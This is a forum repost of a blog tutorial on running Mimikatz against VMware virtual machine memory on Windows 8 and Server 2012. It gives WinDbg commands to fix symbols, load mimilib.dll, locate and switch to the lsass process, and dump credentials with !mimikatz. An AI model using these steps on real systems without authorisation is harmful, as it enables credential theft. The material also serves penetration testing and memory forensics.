Jump to content
Nytro

Mimikatz Against Virtual Machine Memory Part 2

By Nytro, in Tutoriale in engleza

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=3]Mimikatz Against Virtual Machine Memory Part 2[/h]

Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012

First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them:

Use the Microsoft Symbol Server to obtain debug symbol files

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols

Loading unloaded module list
.........

Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility.

Screen+Shot+2014-06-13+at+11.26.55+AM.png

Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above)

For VMware ESXi i just needed to pass the .vmsn file

The rest follows the same flow as the previous post

1. Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe

5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................

6. Run Mimikatz

kd> !mimikatz

Screen+Shot+2014-06-13+at+11.34.05+AM.png

7. Drink Beers

Posted by CG at 11:45 AM

Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...